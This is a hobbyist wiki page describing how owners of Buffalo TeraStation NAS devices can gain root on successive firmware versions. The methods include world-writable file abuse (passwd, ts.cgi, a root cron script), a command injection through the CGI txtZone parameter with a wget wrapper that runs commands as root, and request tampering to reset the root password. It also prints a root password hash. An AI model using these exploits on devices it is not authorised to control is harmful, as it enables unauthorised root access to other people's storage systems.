Terastation Become root

From NAS-Central Buffalo - The Linkstation Wiki
(Redirected from Become root)
Jump to: navigation, search

As each release of the firmware fixes some bugs, new ways to become root must be discovered.


for 1.01 you could hack /usr/local/bin/mailtest.sh


for 1.03 you can log in as admin, then replace /etc/passwd.

/etc is world writable, which allows us to install a customized passwd file with a known password for root.

cd /etc
mv passwd passwd-good
cp passwd-good passwd
vi passwd
(once in vi, copy the hashed password value from the admin account into root's)
exit vi (:q)
(use whatever password you assigned to admin, now also for root)

chown root:root /etc/passwd
(if you want to keep things tidy)

su didn't seem to like an empty root password, so that's why we copy admin's. The hack described in Become_root_(2.04) may work as well, dunno, didn't see it until after I'd done the above.

- SteveK


for 1.04 you can hack /www/cgi-bin/ts.cgi

Once you added a Terastation Serial console you can login as admin and start to explore the [http:/ls-lR/1.04/ file system] but you are not root, yet.

There are no suid-root binaries and root comes with a password: $1$GhRqUjJ1$RPYGfyN1e4002OQ7BRkW20. You could now use a password cracker to get the cleartext password, but there must be a simpler way.

Did you already find it while browsing the [http:/ls-lR/1.04/ file system]?

No? [http:/ls-lR/1.04/_www_cgi-bin.html Look here.]

ts.cgi is the binary that generates web interface. It's quite well written, and filters all input. Hacking the terastation from the web interface looks too complicated as well.

But we are looking at the file on disk, it is world writable!

This small patch:

--- ts.cgi      Mon Apr  4 14:24:03 2005
+++ ts.cgi      Fri Apr 29 10:06:49 2005
@@ -35,6 +35,13 @@
 #### QUERY_STRING�?�指定�?�るページを表示�?�る ###

 ### TOP ###
+if ($query{'page'} eq "hack") {
+    open F, ">/etc/sudoers";
+    print F "admin  ALL = (ALL) ALL\n";
+    close F;
+    chmod 0440, "/etc/sudoers";
+    $query{'page'} = "top";
 if ($query{'page'} eq "top") {
        require "./html/$lang/head.pl";
        require "./html/$lang/body.pl";

allows you to request a "hack" page: http://myterastation.local/cgi-bin/ts.cgi?page=hack and a sudoers file will be written, you will be redirected to the default "top" page.

Now you can use sudo to become r00t:


HD-HTGL113 login: admin
admin@HD-HTGL113:~$ id
uid=1000(admin) gid=100(hdusers) groups=100(hdusers)
admin@HD-HTGL113:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these two things:

        #1) Respect the privacy of others.
        #2) Think before you type.

root@HD-HTGL113:~# id
uid=0(root) gid=0(root) groups=0(root)

have fun.


for 2.04 you can hack /etc/cron.d/progchk

Firmware version 2.04 fixes the modes on the /www/cgi-bin directory, fortunately there are two more world writable files on the filesystem which you can take advantage of.

The easiest approach will be to edit /etc/cron.d/progchk . This shell script is run every minute as root! Just add a couple lines to make it create an /etc/sudoers file as in the 1.04 description and give it the right modes.

# progchk
# The existence of the program is checked in every minute.

echo "admin ALL = (ALL) ALL" > /etc/sudoers
chmod 440 /etc/sudoers


After a minute has passed you'll be able to use sudo to become root. You should probably remove the added lines from progchk, but they won't hurt anything where they are.


for 2.14 you can still hack /www/cgi-bin/ts.cgi

During a long series of mods in which I set up opensshd and disabled telnet access, somehow I lost my ability to log in and couldn't be bothered to reflash and redo all my mods, so I had some fun and found this hack instead :-)

Most of the CGI parameters in the web interface are carefully sanity-checked. But there are still loads of system() calls with the highly dangerous single parameter version! Obviously the authors never heard of Perl's taint mode. After a bit of looking, I found that the txtZone parameter for http://terastation/ts.cgi?page=basic&mode=setup was unchecked, and ends up getting passed directly to this code:

 system("/usr/local/bin/set_timezone.sh $zone");

Oops! So it only remains to craft the right URL and we can run any commands we want on the server as root :-) I wrote a simple Perl script to help do this. Example usage:

 $ ./tera-cgi-hack.pl
 echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf

Log on as admin, then paste this URL into your browser, and it will run the command to enable telnet. No reflashing required :-)

You can go one step further and automate the whole process via wget, sanitizing the output with Perl:

 $ ADMIN_PASSWORD=change-me
 $ HACK_SCRIPT=./tera-cgi-hack.pl
 $ run_as_root () {
   echo "echo MAGIC_START;$*;echo MAGIC_END" | $HACK_SCRIPT > /tmp/url
   wget --http-user=admin --http-passwd=$ADMIN_PASSWORD -O- -q $(</tmp/url) | \
     perl -0777pe "s/.*MAGIC_START\n//s;s/MAGIC_END.*//s"


 $ run_as_root cat /proc/cpuinfo
 cpu             : 82xx
 revision        : 16.20 (pvr 8081 1014)
 bogomips        : 173.26
 vendor          : Motorola SPS
 machine         : Sandpoint
 $ run_as_root uname -a
 Linux HD-HTGLD03 2.4.20_mvl31-ppc_terastation #1 Fri, 01 Dec 2006 10:57:27 +0900 ppc unknown

Almost as good as a real shell ;-)

--Aspiers 18:10, 1 July 2007 (CEST)


I did find what hosed my telnetd and sshd in the end - details are here.


for 2.46 you can set the root password with a HTTP Request

You can set the root password via the web interface by manipulating the http request for updating users. If you change the uid to 0 you will be able to update the root user password - see example below.

I haven't tested this 100% but this changes the password for the root account in the sqlite database (/etc/melco/nas.sqlite3) that seems to be used to create the config files. As such the change to the root password should persist across firmware updates.

Process for firefox

  1. Login the the terastation as admin
  2. Navigate to the users section
  3. Open the edit user settings window for any user (warning you are about to change a user password)
  4. Enter a new password but do not hit OK yet
  5. Open up the dev tools and open the network tab
    • Default short cut Ctrl+Shift+Q
  6. Press OK on the user settings window
  7. Find the /nasapi/ message in the network tab where method = "User.edit" in the Params section (see example)
  8. Right click this request and select "Edit and Resend"
  9. Modify the Request Body
    • Replace the value of uid with 0
    • Replace the value of group_id with 0
    • Replace the value of sub_groups_ids with [0]
  10. Hit the send button
    • If all goes well you should get a 200 response with some json content.
  11. Create a new user (you can delete it after)
    • It didn't work for me until i did this - seems to flush the changes in /etc/melco/nas.sqlite3 to the /etc/shadow file

Example Request

Method: POST

HTTP Headers

Content-Type: application/json

Request Body

   "password":"-- REPLACE ME --",
   "sid":"-- REPLACE ME --"
 "id":"-- REPLACE ME --"


on some releases you can simply log in as root

N.B. These methods do NOT give you the root password. They let you execute commands as root without relying on telnetd or sshd being enabled. Of course, once you can do this you can run passwd or replace /etc/passwd to replace the root password with one you know. At this point you also need to enable telnetd or sshd or some other more convenient way of logging in as root.

telnet-enabled releases: try myroot

Being a newbie and all, it took me a few hours to attempt previously listed methods, all to NO GOOD USE. But I noticed the /etc/passwd file still rules in there. First of all, use your regular admin account and known password. Then vi the passwd file - opens as RO!

  NAS3 login: admin
  admin@NAS:~# vi /etc/passwd

If yout see the myroot account listed there, you're all set...


Log in again with myroot and blank/NO password. Then proceed to replace the root password with your own:

  myroot@NAS:~# passwd root
  Enter new UNIX password:
  Retype new UNIX password:

You may want to change myroot password as well - don´t leave it just blank!

  myroot@NAS:~# passwd
  Enter new UNIX password:
  Retype new UNIX password:

LISTO! Now you're ready to start hacking your TeraStation OS.